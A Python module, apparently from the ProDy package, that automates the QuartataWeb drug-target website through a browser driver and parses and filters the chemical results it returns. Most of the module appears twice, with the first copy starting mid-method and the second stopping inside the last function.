self.browser.find_by_name('db_type')[1].click()
if self.query_type is not None:
self.browser.find_by_name('pattern')[self.query_type - 1].click()
if self.data is not None:
if self.input_type == 1:
if self.query_type == 1:
self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
self.browser.find_by_name('q_target_1')[
0].fill(self.data[1])
elif self.query_type == 2:
self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
self.browser.find_by_name('q_drug_2')[0].fill(self.data[1])
else:
self.browser.find_by_name('q_target_1')[0].fill(self.data[0])
self.browser.find_by_name('q_target_2')[0].fill(self.data[1])
else:
if self.query_type == 1:
self.browser.find_by_name('q_drugs')[0].fill('\n'.join(self.data))
if self.query_type == 2:
self.browser.find_by_name('q_targets')[0].fill('\n'.join(self.data))
else:
self.browser.find_by_name('q_drug_pairs')[0].fill('\n'.join(self.data))
if self.num_predictions is not None:
self.browser.find_by_name('pred_n')[0].fill(self.num_predictions[0])
if self.data_source == 'DrugBank' and self.input_type == 1:
self.browser.find_by_name('pred_n_2nd')[0].fill(self.num_predictions[1])
def setDataSource(self, data_source):
"""Set data_source and update home page
:arg data_source: source database for QuartataWeb analysis
options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
:type data_source: str
"""
if data_source is None:
data_source = 'DrugBank'
elif not isinstance(data_source, str):
raise TypeError('data_source should be a string or None')
elif data_source.lower() == 'drugbank':
data_source = 'DrugBank'
elif data_source.lower() == 'stitch':
data_source = 'STITCH'
else:
raise ValueError('data_source should be DrugBank, STITCH or None')
self.data_source = data_source
self.updateHomePage()
def setDrugGroup(self, group):
"""Set drug_group and update home page
:arg group: group of drugs if using DrugBank
options are ``"Approved"`` or ``"All"``. Default is ``"All"``
:type group: str
"""
if self.data_source == 'DrugBank':
if group is None:
group = 'All'
elif not isinstance(group, str):
raise TypeError('group must be string or None')
elif group.lower() == 'all':
group = 'All'
elif group.lower() == 'approved':
group = 'Approved'
else:
raise ValueError('group should be approved, all or None')
self.drug_group = group
self.updateHomePage()
elif group is not None:
LOGGER.warn('there are no groups when using STITCH')
def setInputType(self, input_type):
"""Set input_type and update home page
:arg input_type: number corresponding to the input type, options are
``1`` (Chemical and/or target) or
``2`` (A list of chemicals, targets or chemical combinations).
Default is ``1``
:type input_type: int
"""
if input_type is None:
input_type = 1
elif not isinstance(input_type, int):
raise TypeError('input_type should be an integer (1 or 2) or None')
elif not input_type in [1, 2]:
raise ValueError('input_type should be 1, 2 or None')
self.input_type = input_type
self.updateHomePage()
def setQueryType(self, query_type):
"""Set query_type and update home page
:arg query_type: number corresponding to the query type. Options are
dependent on input_type.
With input_type 1, they are:
* ``1`` (chemical-target interaction)
* ``2`` (chemical-chemical similarity)
* ``3`` (target-target similarity)
With input_type 2, they are:
* ``1`` (chemicals)
* ``2`` (targets)
* ``3`` (chemical combinations)
Default is ``1``
:type query_type: int
"""
if query_type is None:
query_type = 1
elif not isinstance(query_type, int):
raise TypeError(
'query_type should be an integer (1, 2 or 3) or None')
elif not query_type in [1, 2, 3]:
raise ValueError('query_type should be 1, 2, 3 or None')
self.query_type = query_type
self.updateHomePage()
def setData(self, data):
"""Set data and update home page
:arg data: data to enter into the box or boxes. This varies depending on input type
and query type, but will always be a list of strings.
For input_type 1, a list with two items is expected. These will be one of the
following depending on query_type:
* With query_type 1, the first would be a chemical and the second a target.
One of these can also be left blank.
* With query_type 2, the first would be a chemical and the second a chemical.
* With query_type 3, the first would be a target and the second a target.
For input_type 2, a list with any length is expected. These will be one of the
following depending on query_type:
* With query_type 1, these would be chemicals.
* With query_type 2, these would be targets.
* With query_type 3, these would be pairs of chemicals, separated by semicolons.
:type data: list
"""
if data is None:
LOGGER.warn('data is not set')
elif not isinstance(data, list):
raise TypeError('data should be a list')
else:
for item in data:
if not isinstance(item, str):
raise TypeError('data should be a list of strings')
if self.input_type == 1:
if len(data) > 2:
raise ValueError(
'data can only have two values with input_type 1')
if len(data) == 1:
data.append('')
if self.input_type == 3:
for item in data:
if item.find(';') == -1:
raise ValueError(
'each item in data must be a pair with ; as delimiter')
self.data = data
self.updateHomePage()
def setNumPredictions(self, num_predictions):
"""Set num_predictions and update home page
:arg num_predictions: number of predictions to show or consider in addition to
known interactions. Default is ``0``.
With DrugBank and input_type 1, a second number can be provided in a list
for secondary interactions.
:type num_predictions: int, list
"""
if num_predictions is None:
num_predictions = 0
if not isinstance(num_predictions, (int, list)):
raise TypeError(
'num_predictions should be an integer, a list or None')
if isinstance(num_predictions, int):
num_predictions = [num_predictions, 0]
if num_predictions[0] > 100:
raise ValueError('1st num_predictions must be <= 100')
if num_predictions[1] > 20:
raise ValueError('2nd num_predictions must be <= 20')
self.num_predictions = num_predictions
self.updateHomePage()
def setBrowserType(self, browser_type):
"""Set browser_type and update home page
:arg browser_type: browser type for navigation
Default is ``"Chrome"``
:type browser_type: str
"""
if self.no_data:
try:
from splinter import Browser
except ImportError:
raise ImportError('Browser module could not be imported. '
'install splinter package to solve the problem.')
else:
from selenium.webdriver.common.service import WebDriverException
if browser_type is None:
try:
browser = Browser('chrome')
url = "http://quartata.csb.pitt.edu"
browser.visit(url)
except WebDriverException:
try:
browser = Browser('firefox')
url = "http://quartata.csb.pitt.edu"
browser.visit(url)
except WebDriverException:
raise ValueError(
'No web driver found for Chrome or Firefox. Please specify a browser type or download an appropriate driver.')
else:
self.browser_type = 'firefox'
else:
self.browser_type = 'chrome'
elif not isinstance(browser_type, str):
raise TypeError('browser_type should be a string or None')
else:
try:
browser = Browser(browser_type)
url = "http://quartata.csb.pitt.edu"
browser.visit(url)
except WebDriverException:
raise ValueError(
'No web driver found for browser_type. Please specify a different browser type or download an appropriate driver.')
else:
self.browser_type = browser_type
self.browser = browser
self.updateHomePage()
def setJObID(self, job_id):
"""Set job_id and view results
:arg job_id: job ID for accessing previous jobs
Default is ``None``
:type browser_type: int
"""
self.job_id = job_id
self.viewResults()
def viewResults(self):
"""View results by clicking submit or using a job_id"""
if self.job_id is None or self.browser.url.find('index') != -1:
self.browser.find_by_name('submit')[0].click()
self.job_id = self.browser.url.split('_')[-1].split('=')[-1]
else:
if self.data_source == 'DrugBank':
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result.php?job',
'id={0}'.format(self.job_id)])
else:
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result',
'stitch.php?job', 'id={0}'.format(self.job_id)])
self.browser.visit(url)
def goToDownloads(self):
"""Go to downloads page"""
if self.job_id is None:
self.viewResults()
if self.data_source == 'DrugBank':
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_download.php?job',
'id={0}'.format(self.job_id)])
else:
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_download',
'stitch.php?job', 'id={0}'.format(self.job_id)])
self.browser.visit(url)
def goToWorkDir(self):
"""Go to working directory"""
if self.job_id is None:
self.viewResults()
url = 'http://quartata.csb.pitt.edu/work/{0}'.format(self.job_id)
self.browser.visit(url)
def parseChemicals(self):
"""Go to working directory and parse chemicals for query protein.
Updates self.chemical_data"""
try:
self.goToWorkDir()
if self.data_source == 'DrugBank':
filename = 'known_drugs_for_query_protein.txt'
else:
filename = 'known_chemicals_for_query_protein.txt'
self.browser.find_by_text(filename)[0].click()
import requests
html = requests.get(self.browser.url).content
if PY3K:
html = html.decode()
lines = html.split('\n')
self.fields = lines[0].split('\t')
self.num_fields = len(self.fields)
self.num_rows = len(lines[1:])
if lines[-1].strip() == '':
self.num_rows -= 1
dtypes = []
for i, item in enumerate(lines[1].split('\t')):
if item.isnumeric():
dtypes.append((self.fields[i], int))
elif item.find('.') != -1 and item.replace('.','0').isnumeric():
dtypes.append((self.fields[i], float))
else:
dtypes.append((self.fields[i], object))
self.chemical_data = np.empty(self.num_rows, dtype=dtypes)
for i, line in enumerate(lines[1:self.num_rows+1]):
items = line.split('\t')
if len(items) != self.num_fields:
raise ValueError('line {0} has the wrong number of fields'.format(i+1))
for j, item in enumerate(items):
self.chemical_data[i][j] = item
except:
success = False
else:
success = True
return success
def quit(self):
self.browser.quit()
class QuartataChemicalRecord(object):
"""Class for handling chemical data from QuartataWebBrowser"""
def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Instantiate a QuartataChemicalRecord object instance.
Inputs are the same as QuartataWebBrowser.
"""
self._chemData = None
self._filterDict = None
self.data_source = data_source
self.drug_group = drug_group
self.input_type = input_type
self.query_type = query_type
self.data = data
self.num_predictions = num_predictions
self.browser_type = browser_type
self.job_id = job_id
self.isSuccess = self.fetch(data_source, drug_group, input_type, query_type,
data, num_predictions, browser_type, job_id)
def fetch(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Fetch data"""
if data_source is None:
data_source = self.data_source
if drug_group is None:
drug_group = self.drug_group
if input_type is None:
input_type = self.input_type
if query_type is None:
query_type = self.query_type
if data is None:
data = self.data
if num_predictions is None:
num_predictions = self.num_predictions
if browser_type is None:
browser_type = self.browser_type
if job_id is None:
job_id = self.job_id
self.qwb = QuartataWebBrowser(data_source, drug_group, input_type, query_type,
data, num_predictions, browser_type, job_id)
isSuccess = self.qwb.parseChemicals()
self.qwb.quit()
self._chemData = self.qwb.chemical_data
chem_temp_dict = dict()
listAll = []
for temp in self._chemData:
temp_dict = dict()
chem_name = temp[1]
temp_dict['DB_ID'] = temp[0]
temp_dict['chemical_name'] = chem_name
temp_dict['mol_weight'] = temp[2]
temp_dict['SMILES'] = temp[3]
temp_dict['conf_score'] = temp[4]
chem_temp_dict[chem_name] = temp_dict
listAll.append(chem_name)
self._listAll = tuple(listAll)
self._list = self._listAll
self._chemDict = chem_temp_dict
return isSuccess
def getChemicalList(self, filtered=True):
"""Returns chemical list (filters may be applied)"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
if filtered:
return self._list
return self._listAll
def getSMILESList(self, filtered=True):
"""Returns SMILES list (filters may be applied)"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
if filtered:
return [self._chemDict[key]['SMILES'] for key in self._list]
return self._chemData['SMILES']
def getParticularSMILES(self, key):
"""Returns SMILES for a particular chemical"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
return self._chemDict[key]['SMILES']
def getFilterList(self):
"""Returns a list of chemicals for the entries that were filtered out"""
filterDict = self._filterDict
if filterDict is None:
raise ValueError('You cannot obtain the list of filtered out entries before doing any filtering.')
temp_str = ', '.join([str(len(filterDict['lower_MW'])), str(len(filterDict['upper_MW'])),
str(len(filterDict['conf_score']))])
LOGGER.info('Filtered out [' + temp_str + '] for [lower weight, upper weight, confidence score]')
return self._filterList
def filter(self, lower_weight=None, upper_weight=None, cutoff_score=None):
"""Filters out chemicals from the list and returns the updated list.
Chemicals that satisfy any of the following criterion will be filtered out.
(1) Molecular weight < lower_weight (must be a positive number);
(2) Molecular weight > upper_weight (must be a positive number);
(3) Confidence score < cutoff_score (must be a positive number);
Please note that every time this function is run, this overrides any previous runs.
Therefore, please provide all filters at once.
"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
return None
if lower_weight == None:
lower_weight = 0
elif not isinstance(lower_weight, (float, int)):
raise TypeError('lower_weight must be a float or an integer')
if lower_weight >= 0:
lower_weight = float(lower_weight)
else:
raise ValueError('lower_weight must be a number not less than 0')
if upper_weight == None:
upper_weight = 0
elif not isinstance(upper_weight, (float, int)):
raise TypeError('upper_weight must be a float or an integer')
if upper_weight >= 0:
upper_weight = float(upper_weight)
else:
raise ValueError('upper_weight must be a number not less than 0')
if cutoff_score == None:
cutoff_score = 0
elif not isinstance(cutoff_score, (float, int)):
raise TypeError('cutoff_score must be a float or an integer')
elif cutoff_score >= 0:
cutoff_score = float(cutoff_score)
else:
raise ValueError('cutoff_score must be a number not less than 0')
quartataInfo = self._chemDict
if quartataInfo is None:
raise ValueError("Quartata Chemical Record does not have any data yet. Please run fetch.")
listAll = self._listAll
ref_indices_set = set(range(self.qwb.num_rows))
filterListLowerMW = []
filterListUpperMW = []
filterListConf = []
for chem in listAll:
temp_dict = quartataInfo[chem]
if temp_dict['mol_weight'] < lower_weight:
filterListLowerMW.append(chem)
continue
if upper_weight > 0 and temp_dict['mol_weight'] > upper_weight:
filterListUpperMW.append(chem)
continue
if temp_dict['conf_score'] < cutoff_score:
filterListConf.append(chem)
continue
filterList = filterListLowerMW + filterListUpperMW + filterListConf
filterDict = {'lower_MW': filterListLowerMW, 'upper_MW': filterListUpperMW, 'conf_score': filterListConf}
self._filterList = filterList
self._filterDict = filterDict
self._list = list(set(self._listAll) - set(filterList))
LOGGER.info(str(len(self._listAll)-len(self._list)) + ' chemicals have been filtered out from '+str(len(self._listAll))+' QuartataWeb hits (remaining: '+str(len(self._list))+').')
return self._list
def searchQuartataWeb(data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None, result_type='Chemical'):
"""Wrapper function for searching QuartataWeb"""
if result_type == 'Chemical':
return QuartataChemicalRecord(data_source, drug_group, input_type, query_type,
data, num_predictions, browser_type, job_id)
else:
LOGGER.warn('No other result types are supported yet')
return None
searchQuartataWeb.__doc__ += QuartataWebBrowser.__doc__
|
# -*- coding: utf-8 -*-
"""This module defines classes and functions for browsing QuartataWeb.
----------------------------------------------------------------------------------------
Based on code written by the CHARMM-GUI team (http://charmm-gui.org) and modified by <NAME>
This suite uses the following softwares:
a) python Splinter package (https://splinter.readthedocs.org/en/latest/)
b) a web browser, such as Google Chrome or Mozilla Firefox
c) the corresponding driver such as chromedriver (https://sites.google.com/a/chromium.org/chromedriver/downloads)
for Chrome or geckodriver (https://github.com/mozilla/geckodriver/releases) for Firefox
----------------------------------------------------------------------------------------
"""
from prody import PY3K, LOGGER
import numpy as np
__all__ = ['QuartataWebBrowser', 'QuartataChemicalRecord', 'searchQuartataWeb']
class QuartataWebBrowser(object):
"""Class to browse the QuartataWeb website."""
def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Instantiate a QuartataWebBrowser object instance.
:arg data_source: source database for QuartataWeb analysis
options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
:type data_source: str
:arg drug_group: group of drugs if using DrugBank
options are ``"Approved"`` or ``"All"``. Default is ``"All"``
:type drug_group: str
:arg input_type: number corresponding to the input type, options are
``1`` (Chemical and/or target) or
``2`` (A list of chemicals, targets or chemical combinations).
Default is ``1``
:type input_type: int
:arg query_type: number corresponding to the query type. Options are
dependent on input_type.
With input_type 1, they are:
* ``1`` (chemical-target interaction)
* ``2`` (chemical-chemical similarity)
* ``3`` (target-target similarity)
With input_type 2, they are:
* ``1`` (chemicals)
* ``2`` (targets)
* ``3`` (chemical combinations)
Default is ``1``
:type query_type: int
:arg data: data to enter into the box or boxes. This varies depending on input type
and query type, but will always be a list of strings.
For input_type 1, a list with two items is expected. These will be one of the
following depending on query_type:
* With query_type 1, the first would be a chemical and the second a target.
One of these can also be left blank.
* With query_type 2, the first would be a chemical and the second a chemical.
* With query_type 3, the first would be a target and the second a target.
For input_type 2, a list with any length is expected. These will be one of the
following depending on query_type:
* With query_type 1, these would be chemicals.
* With query_type 2, these would be targets.
* With query_type 3, these would be pairs of chemicals, separated by semicolons.
:type data: list
:arg num_predictions: number of predictions to show or consider in addition to
known interactions. Default is ``0``.
With DrugBank and input_type 1, a second number can be provided in a list
for secondary interactions.
:type num_predictions: int, list
:arg browser_type: browser type for navigation
Default is ``"Chrome"``
:type browser_type: str
:arg job_id: job ID for accessing previous jobs
Default is ``None``
:type browser_type: int
"""
self.browser_type = None
self.browser = None
self.data_source = None
self.drug_group = None
self.input_type = None
self.query_type = None
self.data = None
self.num_predictions = None
self.job_id = job_id
self.setBrowserType(browser_type)
self.setDataSource(data_source)
self.setDrugGroup(drug_group)
self.setInputType(input_type)
self.setQueryType(query_type)
self.setData(data)
self.setNumPredictions(num_predictions)
def updateHomePage(self):
"""Update the home page with data from setting variables"""
url = "http://quartata.csb.pitt.edu"
if self.data_source == 'DrugBank':
url += '/index'
else:
url += '/index_stitch'
if self.input_type == 2:
url += '_2'
url += '.php'
self.browser.visit(url)
if self.data_source == 'DrugBank':
if self.drug_group == 'Approved':
self.browser.find_by_name('db_type')[0].click()
else:
self.browser.find_by_name('db_type')[1].click()
if self.query_type is not None:
self.browser.find_by_name('pattern')[self.query_type - 1].click()
if self.data is not None:
if self.input_type == 1:
if self.query_type == 1:
self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
self.browser.find_by_name('q_target_1')[
0].fill(self.data[1])
elif self.query_type == 2:
self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
self.browser.find_by_name('q_drug_2')[0].fill(self.data[1])
else:
self.browser.find_by_name('q_target_1')[0].fill(self.data[0])
self.browser.find_by_name('q_target_2')[0].fill(self.data[1])
else:
if self.query_type == 1:
self.browser.find_by_name('q_drugs')[0].fill('\n'.join(self.data))
if self.query_type == 2:
self.browser.find_by_name('q_targets')[0].fill('\n'.join(self.data))
else:
self.browser.find_by_name('q_drug_pairs')[0].fill('\n'.join(self.data))
if self.num_predictions is not None:
self.browser.find_by_name('pred_n')[0].fill(self.num_predictions[0])
if self.data_source == 'DrugBank' and self.input_type == 1:
self.browser.find_by_name('pred_n_2nd')[0].fill(self.num_predictions[1])
def setDataSource(self, data_source):
"""Set data_source and update home page
:arg data_source: source database for QuartataWeb analysis
options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
:type data_source: str
"""
if data_source is None:
data_source = 'DrugBank'
elif not isinstance(data_source, str):
raise TypeError('data_source should be a string or None')
elif data_source.lower() == 'drugbank':
data_source = 'DrugBank'
elif data_source.lower() == 'stitch':
data_source = 'STITCH'
else:
raise ValueError('data_source should be DrugBank, STITCH or None')
self.data_source = data_source
self.updateHomePage()
def setDrugGroup(self, group):
"""Set drug_group and update home page
:arg group: group of drugs if using DrugBank
options are ``"Approved"`` or ``"All"``. Default is ``"All"``
:type group: str
"""
if self.data_source == 'DrugBank':
if group is None:
group = 'All'
elif not isinstance(group, str):
raise TypeError('group must be string or None')
elif group.lower() == 'all':
group = 'All'
elif group.lower() == 'approved':
group = 'Approved'
else:
raise ValueError('group should be approved, all or None')
self.drug_group = group
self.updateHomePage()
elif group is not None:
LOGGER.warn('there are no groups when using STITCH')
def setInputType(self, input_type):
"""Set input_type and update home page
:arg input_type: number corresponding to the input type, options are
``1`` (Chemical and/or target) or
``2`` (A list of chemicals, targets or chemical combinations).
Default is ``1``
:type input_type: int
"""
if input_type is None:
input_type = 1
elif not isinstance(input_type, int):
raise TypeError('input_type should be an integer (1 or 2) or None')
elif not input_type in [1, 2]:
raise ValueError('input_type should be 1, 2 or None')
self.input_type = input_type
self.updateHomePage()
def setQueryType(self, query_type):
"""Set query_type and update home page
:arg query_type: number corresponding to the query type. Options are
dependent on input_type.
With input_type 1, they are:
* ``1`` (chemical-target interaction)
* ``2`` (chemical-chemical similarity)
* ``3`` (target-target similarity)
With input_type 2, they are:
* ``1`` (chemicals)
* ``2`` (targets)
* ``3`` (chemical combinations)
Default is ``1``
:type query_type: int
"""
if query_type is None:
query_type = 1
elif not isinstance(query_type, int):
raise TypeError(
'query_type should be an integer (1, 2 or 3) or None')
elif not query_type in [1, 2, 3]:
raise ValueError('query_type should be 1, 2, 3 or None')
self.query_type = query_type
self.updateHomePage()
def setData(self, data):
"""Set data and update home page
:arg data: data to enter into the box or boxes. This varies depending on input type
and query type, but will always be a list of strings.
For input_type 1, a list with two items is expected. These will be one of the
following depending on query_type:
* With query_type 1, the first would be a chemical and the second a target.
One of these can also be left blank.
* With query_type 2, the first would be a chemical and the second a chemical.
* With query_type 3, the first would be a target and the second a target.
For input_type 2, a list with any length is expected. These will be one of the
following depending on query_type:
* With query_type 1, these would be chemicals.
* With query_type 2, these would be targets.
* With query_type 3, these would be pairs of chemicals, separated by semicolons.
:type data: list
"""
if data is None:
LOGGER.warn('data is not set')
elif not isinstance(data, list):
raise TypeError('data should be a list')
else:
for item in data:
if not isinstance(item, str):
raise TypeError('data should be a list of strings')
if self.input_type == 1:
if len(data) > 2:
raise ValueError(
'data can only have two values with input_type 1')
if len(data) == 1:
data.append('')
if self.input_type == 3:
for item in data:
if item.find(';') == -1:
raise ValueError(
'each item in data must be a pair with ; as delimiter')
self.data = data
self.updateHomePage()
def setNumPredictions(self, num_predictions):
"""Set num_predictions and update home page
:arg num_predictions: number of predictions to show or consider in addition to
known interactions. Default is ``0``.
With DrugBank and input_type 1, a second number can be provided in a list
for secondary interactions.
:type num_predictions: int, list
"""
if num_predictions is None:
num_predictions = 0
if not isinstance(num_predictions, (int, list)):
raise TypeError(
'num_predictions should be an integer, a list or None')
if isinstance(num_predictions, int):
num_predictions = [num_predictions, 0]
if num_predictions[0] > 100:
raise ValueError('1st num_predictions must be <= 100')
if num_predictions[1] > 20:
raise ValueError('2nd num_predictions must be <= 20')
self.num_predictions = num_predictions
self.updateHomePage()
def setBrowserType(self, browser_type):
"""Set browser_type and update home page
:arg browser_type: browser type for navigation
Default is ``"Chrome"``
:type browser_type: str
"""
if self.no_data:
try:
from splinter import Browser
except ImportError:
raise ImportError('Browser module could not be imported. '
'install splinter package to solve the problem.')
else:
from selenium.webdriver.common.service import WebDriverException
if browser_type is None:
try:
browser = Browser('chrome')
url = "http://quartata.csb.pitt.edu"
browser.visit(url)
except WebDriverException:
try:
browser = Browser('firefox')
url = "http://quartata.csb.pitt.edu"
browser.visit(url)
except WebDriverException:
raise ValueError(
'No web driver found for Chrome or Firefox. Please specify a browser type or download an appropriate driver.')
else:
self.browser_type = 'firefox'
else:
self.browser_type = 'chrome'
elif not isinstance(browser_type, str):
raise TypeError('browser_type should be a string or None')
else:
try:
browser = Browser(browser_type)
url = "http://quartata.csb.pitt.edu"
browser.visit(url)
except WebDriverException:
raise ValueError(
'No web driver found for browser_type. Please specify a different browser type or download an appropriate driver.')
else:
self.browser_type = browser_type
self.browser = browser
self.updateHomePage()
def setJObID(self, job_id):
"""Set job_id and view results
:arg job_id: job ID for accessing previous jobs
Default is ``None``
:type browser_type: int
"""
self.job_id = job_id
self.viewResults()
def viewResults(self):
"""View results by clicking submit or using a job_id"""
if self.job_id is None or self.browser.url.find('index') != -1:
self.browser.find_by_name('submit')[0].click()
self.job_id = self.browser.url.split('_')[-1].split('=')[-1]
else:
if self.data_source == 'DrugBank':
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result.php?job',
'id={0}'.format(self.job_id)])
else:
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result',
'stitch.php?job', 'id={0}'.format(self.job_id)])
self.browser.visit(url)
def goToDownloads(self):
"""Go to downloads page"""
if self.job_id is None:
self.viewResults()
if self.data_source == 'DrugBank':
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_download.php?job',
'id={0}'.format(self.job_id)])
else:
url = '_'.join(['http://quartata.csb.pitt.edu/quartata_download',
'stitch.php?job', 'id={0}'.format(self.job_id)])
self.browser.visit(url)
def goToWorkDir(self):
"""Go to working directory"""
if self.job_id is None:
self.viewResults()
url = 'http://quartata.csb.pitt.edu/work/{0}'.format(self.job_id)
self.browser.visit(url)
def parseChemicals(self):
"""Go to working directory and parse chemicals for query protein.
Updates self.chemical_data"""
try:
self.goToWorkDir()
if self.data_source == 'DrugBank':
filename = 'known_drugs_for_query_protein.txt'
else:
filename = 'known_chemicals_for_query_protein.txt'
self.browser.find_by_text(filename)[0].click()
import requests
html = requests.get(self.browser.url).content
if PY3K:
html = html.decode()
lines = html.split('\n')
self.fields = lines[0].split('\t')
self.num_fields = len(self.fields)
self.num_rows = len(lines[1:])
if lines[-1].strip() == '':
self.num_rows -= 1
dtypes = []
for i, item in enumerate(lines[1].split('\t')):
if item.isnumeric():
dtypes.append((self.fields[i], int))
elif item.find('.') != -1 and item.replace('.','0').isnumeric():
dtypes.append((self.fields[i], float))
else:
dtypes.append((self.fields[i], object))
self.chemical_data = np.empty(self.num_rows, dtype=dtypes)
for i, line in enumerate(lines[1:self.num_rows+1]):
items = line.split('\t')
if len(items) != self.num_fields:
raise ValueError('line {0} has the wrong number of fields'.format(i+1))
for j, item in enumerate(items):
self.chemical_data[i][j] = item
except:
success = False
else:
success = True
return success
def quit(self):
self.browser.quit()
class QuartataChemicalRecord(object):
"""Class for handling chemical data from QuartataWebBrowser"""
def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Instantiate a QuartataChemicalRecord object instance.
Inputs are the same as QuartataWebBrowser.
"""
self._chemData = None
self._filterDict = None
self.data_source = data_source
self.drug_group = drug_group
self.input_type = input_type
self.query_type = query_type
self.data = data
self.num_predictions = num_predictions
self.browser_type = browser_type
self.job_id = job_id
self.isSuccess = self.fetch(data_source, drug_group, input_type, query_type,
data, num_predictions, browser_type, job_id)
def fetch(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Fetch data"""
if data_source is None:
data_source = self.data_source
if drug_group is None:
drug_group = self.drug_group
if input_type is None:
input_type = self.input_type
if query_type is None:
query_type = self.query_type
if data is None:
data = self.data
if num_predictions is None:
num_predictions = self.num_predictions
if browser_type is None:
browser_type = self.browser_type
if job_id is None:
job_id = self.job_id
self.qwb = QuartataWebBrowser(data_source, drug_group, input_type, query_type,
data, num_predictions, browser_type, job_id)
isSuccess = self.qwb.parseChemicals()
self.qwb.quit()
self._chemData = self.qwb.chemical_data
chem_temp_dict = dict()
listAll = []
for temp in self._chemData:
temp_dict = dict()
chem_name = temp[1]
temp_dict['DB_ID'] = temp[0]
temp_dict['chemical_name'] = chem_name
temp_dict['mol_weight'] = temp[2]
temp_dict['SMILES'] = temp[3]
temp_dict['conf_score'] = temp[4]
chem_temp_dict[chem_name] = temp_dict
listAll.append(chem_name)
self._listAll = tuple(listAll)
self._list = self._listAll
self._chemDict = chem_temp_dict
return isSuccess
def getChemicalList(self, filtered=True):
"""Returns chemical list (filters may be applied)"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
if filtered:
return self._list
return self._listAll
def getSMILESList(self, filtered=True):
"""Returns SMILES list (filters may be applied)"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
if filtered:
return [self._chemDict[key]['SMILES'] for key in self._list]
return self._chemData['SMILES']
def getParticularSMILES(self, key):
"""Returns SMILES for a particular chemical"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
return self._chemDict[key]['SMILES']
def getFilterList(self):
"""Returns a list of chemicals for the entries that were filtered out"""
filterDict = self._filterDict
if filterDict is None:
raise ValueError('You cannot obtain the list of filtered out entries before doing any filtering.')
temp_str = ', '.join([str(len(filterDict['lower_MW'])), str(len(filterDict['upper_MW'])),
str(len(filterDict['conf_score']))])
LOGGER.info('Filtered out [' + temp_str + '] for [lower weight, upper weight, confidence score]')
return self._filterList
def filter(self, lower_weight=None, upper_weight=None, cutoff_score=None):
"""Filters out chemicals from the list and returns the updated list.
Chemicals that satisfy any of the following criterion will be filtered out.
(1) Molecular weight < lower_weight (must be a positive number);
(2) Molecular weight > upper_weight (must be a positive number);
(3) Confidence score < cutoff_score (must be a positive number);
Please note that every time this function is run, this overrides any previous runs.
Therefore, please provide all filters at once.
"""
if not self.isSuccess:
LOGGER.warn('Quartata Chemical Record does not have any data yet.'
'Please run fetch again, possibly with different parameters.')
return None
if lower_weight == None:
lower_weight = 0
elif not isinstance(lower_weight, (float, int)):
raise TypeError('lower_weight must be a float or an integer')
if lower_weight >= 0:
lower_weight = float(lower_weight)
else:
raise ValueError('lower_weight must be a number not less than 0')
if upper_weight == None:
upper_weight = 0
elif not isinstance(upper_weight, (float, int)):
raise TypeError('upper_weight must be a float or an integer')
if upper_weight >= 0:
upper_weight = float(upper_weight)
else:
raise ValueError('upper_weight must be a number not less than 0')
if cutoff_score == None:
cutoff_score = 0
elif not isinstance(cutoff_score, (float, int)):
raise TypeError('cutoff_score must be a float or an integer')
elif cutoff_score >= 0:
cutoff_score = float(cutoff_score)
else:
raise ValueError('cutoff_score must be a number not less than 0')
quartataInfo = self._chemDict
if quartataInfo is None:
raise ValueError("Quartata Chemical Record does not have any data yet. Please run fetch.")
listAll = self._listAll
ref_indices_set = set(range(self.qwb.num_rows))
filterListLowerMW = []
filterListUpperMW = []
filterListConf = []
for chem in listAll:
temp_dict = quartataInfo[chem]
if temp_dict['mol_weight'] < lower_weight:
filterListLowerMW.append(chem)
continue
if upper_weight > 0 and temp_dict['mol_weight'] > upper_weight:
filterListUpperMW.append(chem)
continue
if temp_dict['conf_score'] < cutoff_score:
filterListConf.append(chem)
continue
filterList = filterListLowerMW + filterListUpperMW + filterListConf
filterDict = {'lower_MW': filterListLowerMW, 'upper_MW': filterListUpperMW, 'conf_score': filterListConf}
self._filterList = filterList
self._filterDict = filterDict
self._list = list(set(self._listAll) - set(filterList))
LOGGER.info(str(len(self._listAll)-len(self._list)) + ' chemicals have been filtered out from '+str(len(self._listAll))+' QuartataWeb hits (remaining: '+str(len(self._list))+').')
return self._list
def searchQuartataWeb(data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None, result_type='Chemical'):
"""Wrapper function for searching QuartataWeb"""
